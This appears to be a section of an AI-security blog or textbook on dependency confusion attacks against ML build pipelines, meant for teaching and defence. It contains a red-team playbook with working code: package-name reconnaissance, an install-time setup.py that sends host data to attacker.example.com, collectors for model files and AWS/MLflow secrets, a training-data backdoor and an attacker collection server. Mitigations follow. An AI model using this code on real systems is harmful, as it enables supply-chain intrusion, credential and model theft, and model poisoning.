10.1.4 Dependency Confusion

2025.10.06.
AI Security Blog

Your ML pipeline’s build script faithfully executes pip install -r requirements.txt. One of the lines is my-internal-data-preprocessor==1.2. This package lives on your company’s private PyPI server. What happens if an attacker uploads a package named my-internal-data-preprocessor with a higher version, say 99.9.9, to the public PyPI repository? This simple question exposes a critical vulnerability in the software supply chain that directly impacts AI systems.

The Ambiguity at the Heart of the Attack

Dependency confusion, also known as a namespace confusion attack, exploits the package resolution logic of modern package managers like pip, npm, and Maven. Many development environments are configured to search multiple repositories—typically a private, internal one for proprietary code and a public one for open-source libraries.

The vulnerability arises when a package manager is asked to fetch a dependency that exists, or could exist, in both places. If the resolution logic is not explicitly configured to prioritize the private repository or if it favors the package with the highest version number regardless of its source, it can be tricked into downloading a malicious package from the public repository instead of the legitimate internal one.
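
A common root cause is pip's --extra-index-url option. Unlike --index-url, it does not give the extra index lower priority: pip pools candidate versions from all configured indexes and installs the highest one it finds. A minimal sketch of the vulnerable invocation, with a hypothetical private index URL:

# Risky: --extra-index-url adds a second index with EQUAL priority.
# pip pools candidates from both indexes and installs the highest version.
pip install my-internal-data-preprocessor \
    --extra-index-url https://private-pypi.mycorp.com/simple/
# The private index serves v1.2; if an attacker publishes v99.9.9 on
# public PyPI, pip resolves to the attacker's package.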

[Figure: Dependency confusion attack flow. (1) The ML build server runs pip install my-corp-lib. (2) The package manager queries the private registry (my-corp-lib v1.2) but also checks public PyPI, where the attacker has published my-corp-lib v99.9. (3) Because the public version is higher, the malicious package is pulled. (4) The malicious code executes and exfiltrates data to the attacker's system.]

The AI Supply Chain Attack Surface

While dependency confusion affects all software development, it poses unique risks to AI and machine learning pipelines. The attack surface is not limited to a single server; it spans the entire MLOps lifecycle.

  • Training Environment Compromise: A malicious package installed during training can access sensitive training data, steal cloud credentials (like AWS keys or Azure service principal secrets), or exfiltrate proprietary model architectures.
  • Subtle Model Poisoning: A more sophisticated payload could do more than steal secrets. It could manipulate the data loader to inject a handful of poisoned samples into each training batch, creating a subtle backdoor in the final model that is extremely difficult to detect (a minimal sketch follows this list). For example, it could alter a matrix multiplication function to behave differently for a specific trigger.
  • Inference-Time Attacks: If the dependency is part of the model’s runtime environment, the malicious code could log inference requests and their outputs, stealing sensitive user data processed by the model. It could also manipulate model predictions for specific inputs, causing targeted failures.
  • Intellectual Property Theft: A compromised dependency can serialize and exfiltrate a fully trained model, which often represents significant financial and computational investment.
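
To make the poisoning scenario concrete, here is a minimal, hypothetical sketch of what such a payload might do once imported into a PyTorch-style training process. The dataset interface (returning an image tensor and an integer label), the trigger pattern, and the poison rate are all illustrative assumptions, not a recovered real payload:

# Hypothetical payload fragment: monkey-patch a victim's dataset class
# so roughly 1% of samples carry a visual trigger and a forced label.
import random

def install_backdoor(dataset_cls, rate=0.01, target_label=0):
    original_getitem = dataset_cls.__getitem__

    def poisoned_getitem(self, idx):
        image, label = original_getitem(self, idx)
        if random.random() < rate:
            image = image.clone()        # assumes a PyTorch image tensor
            image[..., -4:, -4:] = 1.0   # trigger: white patch in the corner
            label = target_label         # backdoor: trigger maps to one class
        return image, label

    dataset_cls.__getitem__ = poisoned_getitem  # class-level patch
    return dataset_cls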

Red Team Playbook: Executing a Dependency Confusion Attack

As a red teamer, your goal is to demonstrate this risk. The process is straightforward but requires careful reconnaissance.

Step 1: Discover Internal Package Names

You need to find the names of proprietary, internal packages that are not meant to be public. These are your targets.

  • Code Repositories: Scan the organization’s public and private code repositories (e.g., GitHub, GitLab) for files like requirements.txt, setup.py, pyproject.toml, or package.json; the dependency names they declare are your candidate targets (a harvesting sketch follows this list).
  • Leaked Configuration: Search for build scripts, Dockerfiles, or CI/CD configuration files (e.g., .gitlab-ci.yml) that may have been accidentally exposed. These often contain installation commands revealing internal package names.
  • Public Mentions: Sometimes developers mention internal tools or libraries in public forums, blog posts, or conference talks.
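
As a concrete illustration, a short script can harvest candidate names from a checked-out repository tree. This is a minimal sketch; the single-directory layout and the simple one-requirement-per-line format it assumes are simplifications:

# Hypothetical recon helper: collect dependency names from all
# requirements.txt files under a directory tree.
import pathlib
import re

def harvest_names(root: str) -> set[str]:
    names = set()
    for req_file in pathlib.Path(root).rglob("requirements.txt"):
        for line in req_file.read_text().splitlines():
            line = line.strip()
            if not line or line.startswith(("#", "-")):
                continue  # skip comments and pip options like -r / --index-url
            match = re.match(r"^[A-Za-z0-9][A-Za-z0-9._-]*", line)
            if match:
                names.add(match.group(0).lower())
    return names

print(sorted(harvest_names("./target-repos")))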

Step 2: Craft and Publish the Malicious Package

Once you have a list of candidate package names, check if they are available on public repositories like PyPI or npm. If a name is available, you can claim it.
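
The availability check can be automated against PyPI's JSON API, which returns HTTP 404 for names that have never been claimed. A minimal sketch:

# Check which harvested names are unclaimed on public PyPI.
# A 404 from the JSON API means the name is available to register.
import requests

def unclaimed_on_pypi(names):
    available = []
    for name in names:
        resp = requests.get(f"https://pypi.org/pypi/{name}/json", timeout=10)
        if resp.status_code == 404:
            available.append(name)
    return available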

Your package should have a very high version number (e.g., 99.9.9) to ensure it’s chosen by the package manager. The payload is typically placed in the package’s setup script (setup.py for Python) or an initialization file, so it executes automatically upon installation.

# Malicious setup.py for a Python package.
# setup.py executes when pip builds and installs the source
# distribution, so the code below runs automatically on 'pip install'.
from setuptools import setup, find_packages
import os
import socket

try:
    # Imported inside the try block: if requests is unavailable on the
    # victim machine, the install still completes and looks legitimate.
    import requests

    hostname = socket.gethostname()
    user = os.getenv("USER")
    cwd = os.getcwd()

    # Exfiltrate basic info to an attacker-controlled server
    payload = {'hostname': hostname, 'user': user, 'cwd': cwd}
    requests.post("https://attacker.example.com/collector",
                  json=payload, timeout=5)
except Exception:
    # Fail silently if anything goes wrong
    pass

setup(
    name='my-internal-data-preprocessor',  # the discovered internal package name
    version='99.9.9',  # a very high version number to win resolution
    packages=find_packages(),
    description='A legitimate-looking but malicious package.'
)

In an AI context, the payload could be adapted to find and exfiltrate files ending in .pt, .h5, or .pkl, or to read environment variables prefixed with AWS_ or MLFLOW_.
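
A sketch of that adaptation, under the assumption that the victim keeps model artifacts under the working tree and credentials in environment variables (the file extensions and variable prefixes mirror the examples above; everything else is illustrative):

# Hypothetical AI-focused payload fragment: collect model artifact
# paths and cloud/MLOps environment variables for exfiltration.
import os
import pathlib

def collect_ai_loot(root: str = "."):
    model_files = [
        str(p) for p in pathlib.Path(root).rglob("*")
        if p.suffix in {".pt", ".h5", ".pkl"}
    ]
    secrets = {
        key: value for key, value in os.environ.items()
        if key.startswith(("AWS_", "MLFLOW_"))
    }
    return {"model_files": model_files, "env": secrets}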

Step 3: Wait and Monitor

After publishing, the final step is to wait for an automated build system, a developer’s machine, or a CI/CD pipeline within the target organization to pull and install your package. Monitor your collection server for incoming data.
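
On the attacker side, the collection server can be as simple as a small HTTP listener that logs each beacon. A minimal sketch using only the Python standard library (host, port, and log format are arbitrary choices):

# Minimal collection server: logs every POSTed beacon to stdout.
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

class Collector(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        try:
            print("beacon:", json.loads(body))
        except json.JSONDecodeError:
            print("beacon (raw):", body)
        self.send_response(200)
        self.end_headers()

HTTPServer(("0.0.0.0", 8080), Collector).serve_forever()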

Defensive Strategies and Mitigation

Preventing dependency confusion requires enforcing strict controls over how your systems resolve and fetch software packages. Relying on default configurations is a recipe for compromise.

The key defense mechanisms, with pip-oriented examples:

  • Scope Package Names: Use namespaces or prefixes for all internal packages (e.g., mycorp-). This makes accidental name collisions with public packages less likely. Example: mycorp-data-preprocessor.
  • Explicit Index URL: Configure package managers to use only your private repository. This is the most effective defense but can complicate fetching public packages. Example: pip install --index-url https://private-pypi.mycorp.com/simple/ ...
  • Use a Proxy Repository: Set up a repository manager (like Nexus or Artifactory) that acts as a proxy, serving approved, cached public packages and your private packages from a single trusted source. All pip requests then point to one internal proxy URL.
  • Version Pinning: Pin exact versions of all dependencies (e.g., my-corp-lib==1.2.3). This does not prevent the attack when a package is fetched for the first time, but it stops unexpected upgrades to a malicious version. Example: a requirements.lock or poetry.lock file.
  • Client-Side Verification: Use features like pip’s hash-checking mode to verify that a downloaded package matches a known-good cryptographic hash. Example: pip install -r requirements.txt --require-hashes.
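
For instance, routing every client through a single trusted proxy is usually a one-line pip configuration (the proxy URL below is a hypothetical placeholder):

# /etc/pip.conf (or ~/.pip/pip.conf): route all installs through one
# internal proxy that serves both private and vetted public packages.
[global]
index-url = https://nexus.mycorp.com/repository/pypi-all/simple/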

For AI red teamers, encountering these defenses changes the game. Your focus shifts from a simple upload to finding gaps in these configurations. Is there one legacy build server that doesn’t use the proxy? Can you find a developer machine with a misconfigured client? The battle moves from the public internet to the intricacies of the target’s internal MLOps infrastructure.